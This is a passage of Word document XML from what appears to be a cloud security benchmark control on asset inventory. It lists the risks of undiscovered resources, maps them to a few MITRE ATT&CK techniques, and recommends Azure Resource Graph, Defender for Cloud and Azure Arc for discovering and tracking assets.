          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc242449514"/>
      <w:r w:rsidRPr="00AE0408">
        <w:t>AM-1: Track asset inventory and their risks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="0EBB801B" w14:textId="7B52FBF4" w:rsidR="000737AC" w:rsidRDefault="00EA412E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38328843" w14:textId="115BE983" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="00EA412E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Maintain comprehensive, continuously updated inventory of all assets with automated discovery and classification capabilities. Ensure security organizations have real-time visibility into asset configurations, risk posture, and business criticality across all environments to support effective threat detection, incident response, and compliance verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB0DC28" w14:textId="1F4E8D50" w:rsidR="00EA412E" w:rsidRDefault="00EA412E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA412E">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="663AFF8F" w14:textId="70BE8D84" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Unknown attack surface exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A360F25" w14:textId="50028526" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="0083059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Security teams cannot protect assets they don't know exist, allowing attackers to exploit unmonitored resources and establish persistent access through shadow IT infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1121C" w14:textId="5844DC22" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Incomplete security coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645ABFF4" w14:textId="2E2862C4" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Security controls, monitoring, and compliance policies cannot be applied to undiscovered assets, creating gaps in protection and detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EAFBD" w14:textId="6B5CE27E" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Ineffective incident response prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FAC55" w14:textId="03F375D0" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Lack of asset criticality classification and business impact assessment prevents appropriate incident prioritization, leading to misallocated resources and delayed response to critical threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36019A" w14:textId="73E8539E" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Compliance and audit failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B175DA9" w14:textId="6C5DC80C" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="005F1BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Regulatory frameworks require comprehensive asset inventories for security controls, change management, and data protection verification-absence of accurate inventory creates compliance violations and failed audits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9EE88" w14:textId="0CA31436" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Stale security risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604B817" w14:textId="4D7FEED2" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Security organizations cannot evaluate exposure to emerging threats without continuously updated asset inventory including configuration details, software versions, and vulnerability status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70146267" w14:textId="1ADE7815" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Resource waste and orphaned assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9FEFB6" w14:textId="5CF51F8D" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="005F1BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Organizations pay for abandoned resources, development environments, and test systems that provide no business value while increasing attack surface and operational costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB3FD5B" w14:textId="3DF6399C" w:rsidR="000737AC" w:rsidRDefault="00EA412E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2F573" w14:textId="6F60079A" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D667C" w14:textId="62D211FE" w:rsidR="00043418" w:rsidRDefault="00043418" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00043418">
        <w:lastRenderedPageBreak/>
        <w:t>exploit public-facing application (T1190) targeting unknown or unmonitored internet-facing resources that security teams failed to discover during asset inventory processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEADDB2" w14:textId="12702DCE" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E378FA" w14:textId="7FC3496E" w:rsidR="00043418" w:rsidRDefault="00043418" w:rsidP="0083059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00043418">
        <w:t>create account (T1136) establishing persistent access in shadow IT resources and unmonitored subscriptions outside centralized security visibility and governance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA3B2F" w14:textId="75824179" w:rsidR="00EA412E" w:rsidRDefault="00EA412E" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA412E">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169310AA" w14:textId="013D2AE2" w:rsidR="000737AC" w:rsidRDefault="00043418" w:rsidP="000737AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="388"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00043418">
        <w:t>unused/unsupported cloud regions (T1535) deploying malicious infrastructure in cloud regions not included in asset inventory and security monitoring coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E9A93" w14:textId="323C0B6D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="007D1B50">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-1.1: Implement comprehensive asset inventory and discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254831D" w14:textId="01C5979A" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Deploy Azure Resource Graph and Microsoft Defender for Cloud asset inventory to maintain comprehensive, continuously updated inventory of all Azure resources with automated discovery and classification capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360B067A" w14:textId="15CCBC63" w:rsidR="007D1B50" w:rsidRDefault="007D1B50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve">Azure Resource Graph </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>query capabilities</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="11B87078" w14:textId="66587DF9" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Cross-subscription asset discovery: Query all resources across multiple subscriptions and management groups using Kusto Query Language (KQL) aggregating complete asset inventory for security operations and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527B00D" w14:textId="42327D22" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Asset criticality queries: Query resources by business criticality tags identifying Critical and High-priority assets requiring enhanced security monitoring and faster incident response prioritization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A1B65" w14:textId="04C0D597" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve">Shadow IT detection queries: Identify resources without required ownership, cost center, or compliance scope tags indicating unapproved provisioning </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>bypassing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> security review and governance processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE6BA58" w14:textId="36A22A4E" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Orphaned resource identification: Query unattached disks, unused public IP addresses, idle virtual machines, and abandoned storage accounts consuming budget without business value for decommissioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E06DC7" w14:textId="716F6B94" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Change history and audit tracking: Track resource creation, modification, and deletion events maintaining historical asset inventory identifying unauthorized changes and configuration drift for compliance reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F94516" w14:textId="49A634EC" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Compliance and policy status queries: Query policy compliance status across subscriptions identifying non-compliant resources requiring remediation grouped by regulatory framework or security baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E45A5D" w14:textId="10CFA1D3" w:rsidR="007D1B50" w:rsidRDefault="007D1B50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Microsoft Defender for Cloud asset inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E8195" w14:textId="027CC17D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:lastRenderedPageBreak/>
        <w:t>Security posture visibility: Comprehensive asset inventory with security recommendations, vulnerability assessments, and compliance status integrated into centralized dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B3F5B" w14:textId="438E77D4" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Resource health monitoring: Real-time monitoring of resource health status, security alerts, and configuration drift detection with automatic refresh and updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD86061" w14:textId="0D3779B5" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Defender plan coverage: Track which resources are protected by specific Defender plans including Defender for Servers, Storage, Containers, and Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FA725" w14:textId="77828B6D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Regulatory compliance mapping: Asset inventory automatically mapped to regulatory compliance frameworks including PCI-DSS, HIPAA, and ISO 27001 showing coverage and gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4EC77" w14:textId="0060AB70" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Integration with security workflows: Export asset inventory data to Microsoft Sentinel, Logic Apps, and external SIEM platforms for security automation and correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE49289" w14:textId="6ACD59DA" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="007D1B50">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AM-1.2: Extend inventory to hybrid and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D952B5C" w14:textId="2D705AE6" w:rsidR="007D1B50" w:rsidRPr="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve">Deploy Azure Arc to project on-premises, edge, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> resources into Azure Resource Manager enabling unified asset inventory, governance, and security management across hybrid environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7E739" w14:textId="1B735C30" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Azure Arc-enabled asset discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AEABA2" w14:textId="1F0BB78B" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Azure Arc-enabled servers: Onboard Windows and Linux physical servers and virtual machines hosted outside Azure (on-premises, VMware, Hyper-V, AWS EC2, Google Compute Engine) projecting them into Azure as native Azure resources (Azure Arc-enabled servers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F675FBF" w14:textId="6B95CEB7" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve">Azure Arc-enabled Kubernetes: Connect and manage Kubernetes clusters running anywhere including on-premises, AWS EKS, Google GKE, and other cloud providers with unified governance and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>GitOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> deployment (Azure Arc-enabled Kubernetes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CEA4F" w14:textId="7B360FAB" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Azure Arc-enabled SQL Managed Instance: Manage Azure Arc-enabled SQL Managed Instance deployments running on-premises or in other clouds with unified inventory, lifecycle management, and security governance (Azure Arc-enabled SQL Managed Instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9706C" w14:textId="29122F5D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Azure Arc-enabled PostgreSQL: Manage Azure Arc-enabled PostgreSQL deployments running on-premises or in other clouds with unified inventory, lifecycle management, and security governance (Azure Arc-enabled PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE42A9" w14:textId="37401A1D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:lastRenderedPageBreak/>
        <w:t>Azure Arc-enabled VMware vSphere: Discover and manage VMware virtual machines through Azure enabling self-service VM operations with Azure governance and policies (Azure Arc-enabled VMware vSphere).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2A33F" w14:textId="2DC81A87" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> connector: Connect AWS and Google Cloud accounts to Azure Arc discovering EC2 instances, S3 buckets, and other cloud resources for unified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> inventory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve"> connector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C503A7" w14:textId="1AA67580" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Unified hybrid asset management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7374A7" w14:textId="7517E84D" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Azure Resource Graph integration: Query Azure Arc-enabled resources alongside native Azure resources using Azure Resource Graph providing single-pane inventory across all environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613B3AF" w14:textId="7AA9FFBF" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t>Consistent tagging across clouds: Apply Azure resource tags to Arc-enabled servers and resources regardless of hosting location enabling consistent classification and organization taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E9E65" w14:textId="58EF6B13" w:rsidR="007D1B50" w:rsidRDefault="007D1B50" w:rsidP="00081D59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007D1B50">
        <w:t xml:space="preserve">Hybrid asset grouping: Organize hybrid resources using management groups, resource groups, and subscriptions applying governance hierarchy to non-Azure </w:t>
      </w:r>
      <w:r w:rsidR="001274D4" w:rsidRPr="001274D4">
        <w:t>infrastructure.</w:t>
